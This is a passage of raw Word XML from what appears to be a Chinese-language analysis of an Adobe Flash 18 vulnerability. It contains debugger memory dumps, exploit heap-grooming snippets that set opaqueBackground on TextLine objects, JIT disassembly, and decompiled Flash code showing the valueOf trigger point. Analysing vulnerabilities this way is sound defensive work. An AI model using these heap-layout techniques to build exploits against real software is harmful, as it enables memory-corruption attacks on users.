        <w:t>并且填充</w:t>
      </w:r>
      <w:r w:rsidR="00144047">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，红色字体部分为</w:t>
      </w:r>
      <w:r w:rsidR="00144047">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TextLineObject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:r>
        <w:t>0:008&gt; dd 08d560b0 +0x8 l0x7e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d560b8  09327df9 09327e21 09327e49 09327e99</w:t>
      </w:r>
      <w:r w:rsidR="00EC087E" w:rsidRPr="00EC087E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> //vector&lt;uint&gt;&lt;vlen&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d560c8  09327ec1 09327ee9 08f25039 08f25061</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d560d8  08f25089 08f250b1 08f250d9 08f25101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d560e8  08f25129 08f25151 08f25179 08f251a1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d560f8  08f251c9 08f251f1 08f25219 08f25241</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d56108  08f25269 08f25291 08f252b9 08f252e1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d56118  08f25309 08f25331 08f25359 08f25381</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="006F2ADC" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>08d56128  08f253a9 08f253d1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2ADC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>093a1479 093a15c1</w:t>
      </w:r>
      <w:r w:rsidR="00EC087E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> // </w:t>
      </w:r>
      <w:r w:rsidR="00094149">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>textline object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="006F2ADC" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2ADC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>08d56138  093a1709 093a1851 093a1999 093a1ae1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="006F2ADC" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2ADC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>08d56148  093a1c29 093a1d71 093a1eb9 099570a1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="006F2ADC" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2ADC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>08d56158  099571e9 09957331 09957479 099575c1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2ADC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>08d56168  09957709 09957851</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>08f253f9 08f2542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178  08f25449 08f25471 08f25499 08f254c1</w:t>
      </w:r>
      <w:r w:rsidR="00EC087E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> // vector&lt;uint&gt;(8)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lastRenderedPageBreak/>
        <w:t>08d56188  08f254e9 08f25511 08f25539 08f2556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198  08f25589 08f255b1 08f255d9 08f2560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1a8  08f25629 08f25651 08f25679 08f256a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1b8  08f256c9 08f256f1 08f25719 08f2574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1c8  08f25769 08f25791 08f257b9 08f257e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1d8  08f25809 08f25831 08f25859 08f2588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1e8  08f258a9 08f258d1 08f258f9 08f2592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1f8  08f25949 08f25971 08f25999 08f259c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08  08f259e9 08f25a11 08f25a39 08f25a6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18  08f25a89 08f25ab1 08f25ad9 08f25b0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28  08f25b29 08f25b51 08f25b79 08f25ba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38  08f25bc9 08f25bf1 08f25c19 08f25c4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48  08f25c69 08f25c91 08f25cb9 08f25ce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58  08f25d09 08f25d31 08f25d59 08f25d8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68  08f25da9 08f25dd1 08f25df9 08f25e2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78  08f25e49 08f25e71 08f25e99 08f25ec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88  08f25ee9 08f25f11 08f25f39 08f25f61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2ADC" w:rsidRPr="00EC087E" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>08d56298  08f25f89 08f25fb1 08f25fd9 09956039</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00445A5E" w:rsidRPr="00CC5AAD" w:rsidRDefault="006F2ADC" w:rsidP="006F2ADC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC087E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>08d562a8  09956061 09956089</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F468C" w:rsidRDefault="003F468C" w:rsidP="006F2ADC"/>
    <w:p w:rsidR="00BB485F" w:rsidRDefault="00BB485F" w:rsidP="006F2ADC"/>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00142D32" w:rsidP="0063750F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="0063750F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E11AB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidR="00E11AB5">
        <w:t>opaqueBackground</w:t>
      </w:r>
      <w:r w:rsidR="00935020">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alloc BackGroudObj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00142D32" w:rsidRDefault="00142D32" w:rsidP="00142D32"/>
    <w:p w:rsidR="00142D32" w:rsidRPr="00C53D56" w:rsidRDefault="00142D32" w:rsidP="00142D32"/>
    <w:p w:rsidR="0063750F" w:rsidRDefault="0063750F" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>// fill 1016-byte holes (0x38c is a size of internal TextLine object)</w:t>
      </w:r>
      <w:r w:rsidR="009D01B3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //BackGroudObj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063750F" w:rsidRDefault="0063750F" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">for(i=_arLen1; i &lt; _arLen2; i++) </w:t>
      </w:r>
      <w:r w:rsidR="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="00D63152" w:rsidRPr="00D63152">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0x1e&lt;= i&lt; 0x2e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063750F" w:rsidRDefault="0063750F" w:rsidP="00AD1D34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_ar[i].opaqueBackground = 1; // alloc 1016 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063750F" w:rsidRDefault="00A9562F" w:rsidP="0063750F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此段代码对于上面分配的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TextLineObj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>opaqueBackground</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，触发分配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BackGroundObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B361F" w:rsidRDefault="0070275D" w:rsidP="0063750F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何从上面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟到这里，其实有很</w:t>
      </w:r>
      <w:r w:rsidR="00A9562F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多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比如最简单的单步过来，或者对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>arrary[i]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070275D" w:rsidRDefault="0070275D" w:rsidP="0063750F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下访问读断点之后单步返回到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>领空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070275D" w:rsidRPr="0070275D" w:rsidRDefault="00FB0DA6" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>itcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c8331 83ec0c          sub     esp,0Ch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c8334 53              push    ebx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c8335 e846c931fe      call    Flash32_18_0_0_203!IAEModule_IAEKernel_UnloadModule+0x1ee5c0 (07be4c80)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c833a 83c40c          add     esp,0Ch</w:t>
      </w:r>
      <w:r w:rsidRPr="000F798A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>/ /return textline obj</w:t>
      </w:r>
      <w:r w:rsidR="007B361F" w:rsidRPr="000F798A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000C090E" w:rsidRPr="000F798A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">getproperty </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c8374 ffb514ffffff    push    dword ptr [ebp-0ECh]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c837a 6a0e            push    0Eh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>098c837c 53              push    ebx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c837d 68e0c63109      push    931C6E0h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C53D56" w:rsidRDefault="00C53D56" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>098c8382 ffd0            call    eax {Flash32_18_0_0_203!IAEModule_IAEKernel_UnloadModule+0x206590 (07bfcc50)}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0063750F" w:rsidRPr="00C53D56" w:rsidRDefault="000F798A" w:rsidP="00927389">
      <w:pPr>
        <w:shd w:val="solid" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000F798A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="000F798A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> setproperty</w:t>
      </w:r>
      <w:r w:rsidRPr="000F798A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F798A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>opaqueBackground</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00127592" w:rsidRDefault="00127592" w:rsidP="0063750F"/>
    <w:p w:rsidR="009052EA" w:rsidRDefault="00DC1E92" w:rsidP="009052EA">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1E92">
        <w:t>avmplus::setprop_miss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1E92">
        <w:t>avmplus::setprop_setter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B2F97">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B2F97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A9562F">
        <w:t>……</w:t>
      </w:r>
      <w:r w:rsidR="00A9562F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r w:rsidR="009B2F97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="009B2F97" w:rsidRPr="009B2F97">
        <w:t>sub_1025DD12</w:t>
      </w:r>
      <w:r w:rsidR="009052EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009052EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果加载了</w:t>
      </w:r>
      <w:r w:rsidR="009052EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>av</w:t>
      </w:r>
      <w:r w:rsidR="00315D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1FEF" w:rsidRDefault="009052EA" w:rsidP="009052EA">
      <w:pPr>
        <w:ind w:right="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>plus sig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话可以看到一些符号路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B2F97" w:rsidRDefault="009B2F97" w:rsidP="0063750F"/>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="0063750F"/>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t>void __thiscall set_opaqueBackground(int textline_obj, unsigned int a2)</w:t>
      </w:r>
      <w:r w:rsidR="001807C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r w:rsidR="001807C8" w:rsidRPr="001807C8">
        <w:t xml:space="preserve"> 1025DD12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  int v2; // ebp@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  int v3; // edi@1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  int buf; // eax@2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  int v5; // esi@2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  signed int v6; // eax@7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD"/>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  v2 = textline_obj;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  v3 = *(_DWORD *)(textline_obj + 0x24);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  if ( v3 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    buf = sub_10021F6D(v3);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    v5 = buf;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    if ( a2 &gt; 4 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      if ( !buf )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        v5 = sub_1025DC52((void *)v2);          // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配</w:t>
      </w:r>
      <w:r w:rsidR="007E461F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x390 </w:t>
      </w:r>
      <w:r w:rsidR="007E461F" w:rsidRPr="007E461F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>BackgroudObj</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      avmplus::AvmCore::integer(a2);            // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对参数进行转换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valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      *(_DWORD *)(v5 + 0x30C) |= 4u;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(sub_102B7B16(v2) + 2144) = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x322) = v6 &gt;&gt; 16;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x320) = v6;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">      *(_BYTE *)(v5 + 0x321) = BYTE1(v6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    else if ( buf )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D71EFD" w:rsidRDefault="00D71EFD" w:rsidP="00D71EFD">
